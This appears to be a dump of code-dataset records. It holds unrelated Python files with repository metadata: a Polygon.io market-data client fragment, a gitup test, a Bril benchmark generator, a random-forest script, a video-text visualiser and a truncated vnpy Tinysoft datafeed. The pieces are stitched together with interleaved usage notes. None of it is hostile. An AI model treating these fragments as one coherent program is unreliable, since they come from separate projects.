ex_dividend_date_gt: Optional[Union[str, date]] = None,
ex_dividend_date_gte: Optional[Union[str, date]] = None,
record_date: Optional[Union[str, date]] = None,
record_date_lt: Optional[Union[str, date]] = None,
record_date_lte: Optional[Union[str, date]] = None,
record_date_gt: Optional[Union[str, date]] = None,
record_date_gte: Optional[Union[str, date]] = None,
declaration_date: Optional[Union[str, date]] = None,
declaration_date_lt: Optional[Union[str, date]] = None,
declaration_date_lte: Optional[Union[str, date]] = None,
declaration_date_gt: Optional[Union[str, date]] = None,
declaration_date_gte: Optional[Union[str, date]] = None,
pay_date: Optional[Union[str, date]] = None,
pay_date_lt: Optional[Union[str, date]] = None,
pay_date_lte: Optional[Union[str, date]] = None,
pay_date_gt: Optional[Union[str, date]] = None,
pay_date_gte: Optional[Union[str, date]] = None,
frequency: Optional[Union[int, Frequency]] = None,
cash_amount: Optional[float] = None,
cash_amount_lt: Optional[float] = None,
cash_amount_lte: Optional[float] = None,
cash_amount_gt: Optional[float] = None,
cash_amount_gte: Optional[float] = None,
dividend_type: Optional[Union[str, DividendType]] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Dividend], HTTPResponse]:
"""
Get a list of historical cash dividends, including the ticker symbol, declaration date, ex-dividend date, record date, pay date, frequency, and amount.
:param ticker: Return the dividends that contain this ticker.
:param ticker_lt: Ticker less than.
:param ticker_lte: Ticker less than or equal to.
:param ticker_gt: Ticker greater than.
:param ticker_gte: Ticker greater than or equal to.
:param ex_dividend_date: Query by ex-dividend date with the format YYYY-MM-DD.
:param ex_dividend_date_lt: Ex-dividend date less than.
:param ex_dividend_date_lte: Ex-dividend date less than or equal to.
:param ex_dividend_date_gt: Ex-dividend date greater than.
:param ex_dividend_date_gte: Ex-dividend date greater than or equal to.
:param record_date: Query by record date with the format YYYY-MM-DD.
:param record_date_lt: Record date less than.
:param record_date_lte: Record date less than or equal to.
:param record_date_gt: Record date greater than.
:param record_date_gte: Record date greater than or equal to.
:param declaration_date: Query by declaration date with the format YYYY-MM-DD.
:param declaration_date_lt: Declaration date less than.
:param declaration_date_lte: Declaration date less than or equal to.
:param declaration_date_gt: Declaration date greater than.
:param declaration_date_gte: Declaration date greater than or equal to.
:param pay_date: Query by pay date with the format YYYY-MM-DD.
:param pay_date_lt: Pay date less than.
:param pay_date_lte: Pay date less than or equal to.
:param pay_date_gt: Pay date greater than.
:param pay_date_gte: Pay date greater than or equal to.
:param frequency: Query by the number of times per year the dividend is paid out. Possible values are 0 (one-time), 1 (annually), 2 (bi-annually), 4 (quarterly), and 12 (monthly).
:param cash_amount: Query by the cash amount of the dividend.
:param dividend_type: Query by the type of dividend. Dividends that have been paid and/or are expected to be paid on consistent schedules are denoted as CD. Special Cash dividends that have been paid that are infrequent or unusual, and/or can not be expected to occur in the future are denoted as SC.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of dividends.
"""
url = "/v3/reference/dividends"
return self._paginate(
path=url,
params=self._get_params(self.list_dividends, locals()),
raw=raw,
deserializer=Dividend.from_dict,
)
class ConditionsClient(BaseClient):
def list_conditions(
self,
asset_class: Optional[Union[str, AssetClass]] = None,
data_type: Optional[Union[str, DataType]] = None,
id: Optional[int] = None,
sip: Optional[Union[str, SIP]] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Condition], HTTPResponse]:
"""
List all conditions that Polygon.io uses.
:param asset_class: Filter for conditions within a given asset class.
:param data_type: Data types that this condition applies to.
:param id: Filter for conditions with a given ID.
:param sip: Filter by SIP. If the condition contains a mapping for that SIP, the condition will be returned.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of conditions.
"""
url = "/v3/reference/conditions"
return self._paginate(
path=url,
params=self._get_params(self.list_conditions, locals()),
raw=raw,
deserializer=Condition.from_dict,
)
class ExchangesClient(BaseClient):
def get_exchanges(
self,
asset_class: Optional[Union[str, AssetClass]] = None,
locale: Optional[Union[str, Locale]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[List[Exchange], HTTPResponse]:
"""
List all exchanges that Polygon.io knows about.
:param asset_class: Filter by asset class.
:param locale: Filter by locale.
:param params: Any additional query params.
:param raw: Return HTTPResponse object instead of results object.
:return: List of exchanges.
"""
url = "/v3/reference/exchanges"
return self._get(
path=url,
params=params,
deserializer=Exchange.from_dict,
raw=raw,
result_key="results",
)
class ContractsClient(BaseClient):
def get_options_contract(
self,
ticker: str,
as_of: Union[str, date] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[OptionsContract, HTTPResponse]:
"""
Get a single options contract by its options ticker.
:param ticker: The ticker symbol of the asset
:param as_of: Specify a point in time for the contract as of this date with format YYYY-MM-DD.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: Options contract.
"""
url = f"/v3/reference/options/contracts/{ticker}"
return self._get(
path=url,
params=self._get_params(self.get_options_contract, locals()),
result_key="results",
deserializer=OptionsContract.from_dict,
raw=raw,
)
def list_options_contracts(
self,
underlying_ticker: Optional[str] = None,
underlying_ticker_lt: Optional[str] = None,
underlying_ticker_lte: Optional[str] = None,
underlying_ticker_gt: Optional[str] = None,
underlying_ticker_gte: Optional[str] = None,
contract_type: Optional[str] = None,
expiration_date: Optional[Union[str, date]] = None,
expiration_date_lt: Optional[Union[str, date]] = None,
expiration_date_lte: Optional[Union[str, date]] = None,
expiration_date_gt: Optional[Union[str, date]] = None,
expiration_date_gte: Optional[Union[str, date]] = None,
as_of: Optional[Union[str, date]] = None,
strike_price: Optional[float] = None,
strike_price_lt: Optional[float] = None,
strike_price_lte: Optional[float] = None,
strike_price_gt: Optional[float] = None,
strike_price_gte: Optional[float] = None,
expired: Optional[bool] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[OptionsContract], HTTPResponse]:
"""
List historical options contracts.
:param underlying_ticker: Query for contracts relating to an underlying stock ticker.
:param contract_type: Query by the type of contract.
:param expiration_date: Query by contract expiration with date format YYYY-MM-DD.
:param as_of: Specify a point in time for contracts as of this date with format YYYY-MM-DD.
:param strike_price: Query by strike price of a contract.
:param expired: Query for expired contracts.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object
:return: List of options contracts.
"""
url = "/v3/reference/options/contracts"
return self._paginate(
path=url,
params=self._get_params(self.list_options_contracts, locals()),
raw=raw,
deserializer=OptionsContract.from_dict,
)
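A hedged usage sketch: these client classes are normally reached through the package's RESTClient facade (assumed here); the API key is a placeholder and the printed field names are taken on the assumption that the Ticker and Dividend models expose them.
from polygon import RESTClient

client = RESTClient(api_key="YOUR_API_KEY")  # placeholder credentials
for t in client.list_tickers(market="stocks", active=True, limit=5):
    print(t.ticker, t.name)
for div in client.list_dividends(ticker="AAPL", limit=3):
    print(div.ex_dividend_date, div.cash_amount)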
| 0
| 21,145
| 161
|
3a917aec646616b14d05103f2a853a51a6359d7f
| 459
|
py
|
Python
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 772
|
2015-01-17T09:11:07.000Z
|
2022-03-23T08:50:31.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 50
|
2015-03-12T14:33:51.000Z
|
2022-03-10T07:58:54.000Z
|
gitup/test/test_bookmarks.py
|
hr157/git-repo-updater
|
4ad20a6979226bf066740287accc8239d82a89ec
|
[
"MIT"
] | 110
|
2015-01-30T07:27:23.000Z
|
2021-12-15T07:22:20.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <ben.kurtovic@gmail.com>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
from gitup import config
| 30.6
| 71
| 0.736383
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2018 Ben Kurtovic <ben.kurtovic@gmail.com>
# Released under the terms of the MIT License. See LICENSE for details.
from __future__ import print_function, unicode_literals
from gitup import config
def test_empty_list(tmpdir, capsys):
config_path = tmpdir / "config"
config.list_bookmarks(config_path)
captured = capsys.readouterr()
assert captured.out == "You have no bookmarks to display.\n"
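A small hedged sketch of the same call outside pytest; the config path below is illustrative and assumed not to exist yet, so the bookmark list comes back empty.
from gitup import config

config.list_bookmarks("./no_such_config")  # prints: You have no bookmarks to display.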
| 190
| 0
| 23
|
8d619e7f57b45654b3e4b1e082e471adaafd8081
| 596
|
py
|
Python
|
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
benchmark/matrix_product.py
|
xu3kev/bril
|
7d21628621b584e1ec09b3960bf9909276ba7f25
|
[
"MIT"
] | null | null | null |
from cg import *
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
| 19.225806
| 54
| 0.510067
|
from cg import *
from random import randint
cg = CG()
n=20
c = [[Var("int") for i in range(n)] for i in range(n)]
a = [[Var("int") for i in range(n)] for i in range(n)]
b = [[Var("int") for i in range(n)] for i in range(n)]
m=100
for vs in a:
for v in vs:
cg.init(v, randint(0,m))
for vs in b:
for v in vs:
cg.init(v, randint(0,m))
for i in range(n):
for j in range(n):
cg.init(c[i][j], 0)
for k in range(n):
tmp = Var("int")
cg.op_mul(tmp, a[i][k], b[k][j])
cg.op_add(c[i][j], c[i][j], tmp)
cg.print_code()
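For reference, a hedged plain-NumPy sketch of what the generated Bril program computes: the product c = a x b of two n x n integer matrices with entries up to m.
import numpy as np

n, m = 20, 100
a_ref = np.random.randint(0, m + 1, size=(n, n))
b_ref = np.random.randint(0, m + 1, size=(n, n))
c_ref = a_ref @ b_ref  # same triple loop expressed above with cg.op_mul / cg.op_add
print(c_ref.shape)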
| 0
| 0
| 0
|
d00adb83565673cb264520ebee0b3eda48e2f0c5
| 2,523
|
py
|
Python
|
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
weighted_mean_prediction/random_forest/tuned_rf_model.py
|
fegb-dataset22/dataset22
|
6642a01ca7ab9948c9b5ffc3aae1201cd8c72f0b
|
[
"MIT"
] | null | null | null |
import os.path
from typing import Dict
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model, save_model
from weighted_mean_prediction.regression_performance import plot_rf_feature_importances
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
# sklearn metrics take (y_true, y_pred): pass the test targets first
mape = metrics.mean_absolute_percentage_error(y_test, predictions)
mse = metrics.mean_squared_error(y_test, predictions)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
| 37.656716
| 100
| 0.738407
|
import os.path
from typing import Dict
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
from sklearn.ensemble import RandomForestRegressor
from hyperparameter_tuning.study_functions import load_study
from root import ROOT_DIR
from weighted_mean_prediction.data_setup import get_encoded_split_data
from weighted_mean_prediction.model_storage import load_model, save_model
from weighted_mean_prediction.regression_performance import plot_rf_feature_importances
def is_same_params(study_params: Dict[str, object],
model_params: Dict[str, object]) -> bool:
return all([study_params[p] == model_params[p] for p in study_params.keys()])
def train_tuned_model(model_params: Dict[str, object], X_train: pd.DataFrame, y_train: pd.DataFrame,
file_path: str) -> RandomForestRegressor:
model = RandomForestRegressor(**model_params, random_state=0)
model.fit(X_train, y_train)
save_model(model, file_path)
return model
if __name__ == "__main__":
study_dir = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/studies"
study_name = f"rf_study2.joblib"
study_path = os.path.join(study_dir, study_name)
model_name = "rf2.joblib"
model_path = f"{ROOT_DIR}/weighted_mean_prediction/random_forest/models/{model_name}"
X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()
X_train = pd.concat([X_train, X_val])
y_train = pd.concat([y_train, y_val])
study = load_study(study_path)
rf: RandomForestRegressor = load_model(model_path)
if rf is None:
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
else:
if not is_same_params(study.best_params, rf.get_params()):
rf = train_tuned_model(study.best_params, X_train, y_train["weighted_mean"], model_path)
train_acc = rf.score(X_train, y_train)
test_acc = rf.score(X_test, y_test)
print(train_acc, test_acc)
for idx, importance in enumerate(rf.feature_importances_):
print(f"{X_train.columns[idx]} : {importance}")
# plot_rf_feature_importances(rf.feature_importances_)
predictions = rf.predict(X_test)
# sklearn metrics take (y_true, y_pred): pass the test targets first
mape = metrics.mean_absolute_percentage_error(y_test, predictions)
mse = metrics.mean_squared_error(y_test, predictions)
print("\nMAPE = ", mape)
print("MSE = ", mse)
plt.scatter(range(len(predictions[:100])), predictions[:100])
plt.scatter(range(len(y_test[:100])), y_test[:100])
plt.show()
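A quick check that mean_absolute_percentage_error is not symmetric, which is why the (y_true, y_pred) argument order used above matters; the numbers are illustrative.
from sklearn import metrics

y_true = [100.0, 200.0]
y_pred = [110.0, 180.0]
print(metrics.mean_absolute_percentage_error(y_true, y_pred))  # 0.10
print(metrics.mean_absolute_percentage_error(y_pred, y_true))  # ~0.101, a different value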
| 464
| 0
| 46
|
0278f07d5c4fcf43dea6388a703c9cfa378a80f3
| 4,464
|
py
|
Python
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
weijiawu/BOVText-Benchmark
|
375cc1c72e20fb751e17a33c74fc4ca5c1557389
|
[
"CC-BY-4.0"
] | 24
|
2021-10-12T04:02:31.000Z
|
2022-03-31T07:19:17.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 1
|
2021-10-12T04:06:14.000Z
|
2021-10-12T04:06:14.000Z
|
Evaluation_Protocol/Task2_VideoTextSpotting/utils/Annotation_Deal/vis.py
|
maoxiaofei99/BOVText-Benchmark
|
880342867704f8be78fb8f8e1615a234a287a574
|
[
"CC-BY-4.0"
] | 5
|
2021-11-29T05:18:36.000Z
|
2022-02-27T02:22:47.000Z
|
# -*- coding: utf-8 -*-
import cv2
import os
import copy
import numpy as np
import math
# import Levenshtein
from cv2 import VideoWriter, VideoWriter_fourcc
import json
from tqdm import tqdm
from PIL import Image, ImageDraw, ImageFont
import shutil
def Frames2Video(frames_dir=""):
''' Merge all video frames under frames_dir into one video '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
fourcc = VideoWriter_fourcc(*"MJPG") # 支持jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
| 35.428571
| 144
| 0.600582
|
# -*- coding: utf-8 -*-
import cv2
import os
import copy
import numpy as np
import math
# import Levenshtein
from cv2 import VideoWriter, VideoWriter_fourcc
import json
from tqdm import tqdm
from PIL import Image, ImageDraw, ImageFont
import shutil
def Frames2Video(frames_dir=""):
''' Merge all video frames under frames_dir into one video '''
img_root = frames_dir #'E:\\KSText\\videos_frames\\video_14_6'
image = cv2.imread(os.path.join(img_root,"1.jpg"))
h,w,_ = image.shape
out_root = frames_dir+".avi"
# Edit each frame's appearing time!
fps = 20
fourcc = VideoWriter_fourcc(*"MJPG") # 支持jpg
videoWriter = cv2.VideoWriter(out_root, fourcc, fps, (w, h))
im_names = os.listdir(img_root)
num_frames = len(im_names)
print(len(im_names))
for im_name in tqdm(range(1, num_frames+1)):
string = os.path.join( img_root, str(im_name) + '.jpg')
# print(string)
frame = cv2.imread(string)
# frame = cv2.resize(frame, (w, h))
videoWriter.write(frame)
videoWriter.release()
shutil.rmtree(img_root)
def get_annotation(video_path):
annotation = {}
with open(video_path,'r',encoding='utf-8-sig') as load_f:
gt = json.load(load_f)
for child in gt:
lines = gt[child]
annotation.update({child:lines})
return annotation
def cv2AddChineseText(img, text, position, textColor=(0, 255, 0), textSize=30):
if (isinstance(img, np.ndarray)): # check whether this is an OpenCV image (numpy ndarray)
img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
# create a drawing object for the given image
draw = ImageDraw.Draw(img)
# font settings
fontStyle = ImageFont.truetype(
"./simsun.ttc", textSize, encoding="utf-8")
# draw the text
draw.text(position, text, textColor, font=fontStyle)
# convert back to OpenCV format
return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
if __name__ == "__main__":
root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Video_Frame"
json_root = "/home/guoxiaofeng/.jupyter/wuweijia/VideoTextSpotting/MMVText_20S/New_Add/Annotation"
result_path_cls = "./vis"
seqs = ["48901770165" , "49004756658" , "49287498737", "49424491900", "49466537994", "49552222543","49983613955","Cls18_1","Cls26_1","demo"]
for video_name in tqdm(os.listdir(json_root)):
annotation_path_ = os.path.join(json_root, video_name)
video_path_ = os.path.join(root, video_name.split(".json")[0])
annotation = get_annotation(annotation_path_)
if video_name.split(".json")[0] in seqs:
continue
result_path_cls_video = os.path.join(result_path_cls, video_name.split(".json")[0])
if not os.path.exists(result_path_cls_video):
os.makedirs(result_path_cls_video)
else:
continue
for frame_id in annotation.keys():
frame_name = video_name.split(".json")[0] + "_" + frame_id.zfill(6) + ".jpg"
frame_path = os.path.join(video_path_,frame_name)
frame = cv2.imread(frame_path)
# print(frame_path)
annotatation_frame = annotation[frame_id]
for data in annotatation_frame:
x1,y1,x2,y2,x3,y3,x4,y4,ID, content,is_caption = data
# print(data)
id_content = str(content) + " " + str(ID)
# print(id_content)
# print(frame.shape)
if is_caption == "scene":
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 0, 255), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
else:
points = np.array([[x1, y1], [x2, y2], [x3, y3], [x4, y4]], np.int32)
cv2.polylines(frame, [points], True, (0, 255, 0), thickness=3)
frame=cv2AddChineseText(frame,id_content, (int(x1), int(y1) - 20),(0, 255, 0), 45)
# if not os.path.exists(result_path):
# os.makedirs(result_path)
frame_vis_path = os.path.join(result_path_cls_video, frame_id+".jpg")
cv2.imwrite(frame_vis_path, frame)
# video_vis_path = "./"
Frames2Video(frames_dir=result_path_cls_video)
# break
# break
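A hedged usage sketch for cv2AddChineseText defined above: overlay a UTF-8 label on a blank frame. It requires the ./simsun.ttc font referenced in the function, and the output path is illustrative.
blank = np.zeros((200, 400, 3), dtype=np.uint8)
labeled = cv2AddChineseText(blank, "text 文本 1", (10, 80), textColor=(0, 255, 0), textSize=40)
cv2.imwrite("label_demo.jpg", labeled)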
| 803
| 0
| 50
|
132e0421e9b24a450962f82bb4efb1ae59d84d80
| 5,814
|
py
|
Python
|
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | null | null | null |
vnpy_tinysoft/tinysoft_datafeed.py
|
noranhe/vnpy_tinysoft
|
aaa00679adf93b40710e03113411adc24a98a038
|
[
"MIT"
] | 1
|
2021-10-30T05:32:06.000Z
|
2021-11-01T11:36:15.000Z
|
vnpy_tinysoft/tinysoft_datafeed.py
|
vnpy/vnpy_tinysoft
|
0d97a91251c02f1b2a7e4afd707a2157056605c6
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from pytz import timezone
from vnpy.trader.setting import SETTINGS
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, TickData, HistoryRequest
from vnpy.trader.utility import extract_vt_symbol
from vnpy.trader.datafeed import BaseDatafeed
from .pyTSL import Client, DoubleToDatetime
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
class TinysoftDatafeed(BaseDatafeed):
"""天软数据服务接口"""
def __init__(self):
""""""
self.username: str = SETTINGS["datafeed.username"]
self.password: str = SETTINGS["datafeed.password"]
self.client: Client = None
self.inited: bool = False
def init(self) -> bool:
"""初始化"""
if self.inited:
return True
self.client = Client(
self.username,
self.password,
"tsl.tinysoft.com.cn",
443
)
n: int = self.client.login()
if n != 1:
return False
self.inited = True
return True
def query_bar_history(self, req: HistoryRequest) -> Optional[List[BarData]]:
"""查询K线数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
tsl_interval: str = INTERVAL_MAP[req.interval]
bars: List[BarData] = []
start_str: str = req.start.strftime("%Y%m%d")
end_str: str = req.end.strftime("%Y%m%d")
cmd: str = (
f"setsysparam(pn_cycle(),{tsl_interval}());"
"return select * from markettable "
f"datekey {start_str}T to {end_str}T "
f"of '{tsl_exchange}{symbol}' end;"
)
result = self.client.exec(cmd)
if not result.error():
data = result.value()
shift: timedelta = SHIFT_MAP.get(req.interval, None)
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
if shift:
dt -= shift
bar: BarData = BarData(
symbol=symbol,
exchange=exchange,
datetime=CHINA_TZ.localize(dt),
interval=req.interval,
open_price=d["open"],
high_price=d["high"],
low_price=d["low"],
close_price=d["close"],
volume=d["vol"],
turnover=d["amount"],
gateway_name="TSL"
)
# for futures, also read the open interest field
if not tsl_exchange:
bar.open_interest = d["sectional_cjbs"]
bars.append(bar)
return bars
def query_tick_history(self, req: HistoryRequest) -> Optional[List[TickData]]:
"""查询Tick数据"""
if not self.inited:
self.init()
symbol, exchange = extract_vt_symbol(req.vt_symbol)
tsl_exchange: str = EXCHANGE_MAP.get(exchange, "")
ticks: List[TickData] = []
dt: datetime = req.start
while dt <= req.end:
date_str: str = dt.strftime("%Y%m%d")
cmd: str = f"return select * from tradetable datekey {date_str}T to {date_str}T+16/24 of '{tsl_exchange}{symbol}' end ; "
result = self.client.exec(cmd)
if not result.error():
data = result.value()
for d in data:
dt: datetime = DoubleToDatetime(d["date"])
dt: datetime = CHINA_TZ.localize(dt)
tick: TickData = TickData(
symbol=symbol,
exchange=exchange,
name=d["StockName"],
datetime=dt,
open_price=d["sectional_open"],
high_price=d["sectional_high"],
low_price=d["sectional_low"],
last_price=d["price"],
volume=d["sectional_vol"],
turnover=d["sectional_amount"],
bid_price_1=d["buy1"],
bid_price_2=d["buy2"],
bid_price_3=d["buy3"],
bid_price_4=d["buy4"],
bid_price_5=d["buy5"],
ask_price_1=d["sale1"],
ask_price_2=d["sale2"],
ask_price_3=d["sale3"],
ask_price_4=d["sale4"],
ask_price_5=d["sale5"],
bid_volume_1=d["bc1"],
bid_volume_2=d["bc2"],
bid_volume_3=d["bc3"],
bid_volume_4=d["bc4"],
bid_volume_5=d["bc5"],
ask_volume_1=d["sc1"],
ask_volume_2=d["sc2"],
ask_volume_3=d["sc3"],
ask_volume_4=d["sc4"],
ask_volume_5=d["sc5"],
localtime=dt,
gateway_name="TSL"
)
# for futures, also read the open interest field
if not tsl_exchange:
tick.open_interest = d["sectional_cjbs"]
ticks.append(tick)
dt += timedelta(days=1)
return ticks
| 31.945055
| 133
| 0.491916
|
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from pytz import timezone
from vnpy.trader.setting import SETTINGS
from vnpy.trader.constant import Exchange, Interval
from vnpy.trader.object import BarData, TickData, HistoryRequest
from vnpy.trader.utility import extract_vt_symbol
from vnpy.trader.datafeed import BaseDatafeed
from .pyTSL import Client, DoubleToDatetime
EXCHANGE_MAP: Dict[Exchange, str] = {
Exchange.SSE: "SH",
Exchange.SZSE: "SZ"
}
INTERVAL_MAP: Dict[Interval, str] = {
Interval.MINUTE: "cy_1m",
Interval.HOUR: "cy_60m",
Interval.DAILY: "cy_day",
}
SHIFT_MAP: Dict[Interval, timedelta] = {
Interval.MINUTE: timedelta(minutes=1),
Interval.HOUR: timedelta(hours=1),
}
CHINA_TZ = timezone("Asia/Shanghai")
class TinysoftDatafeed(BaseDatafeed):
"""天软数据服务接口"""
def __init__(self):
""""""
self.username: str = SETTINGS["datafeed.username"]
self.password: str = SETTINGS["datafeed.password"]
self.client: Client = None
self.inited: bool = False
def init(self) -> bool:
"""初始化"""
if self.inited:
return True
self.client = Client(
self.username,
self.password,
"tsl.tinysoft.com.cn",
443
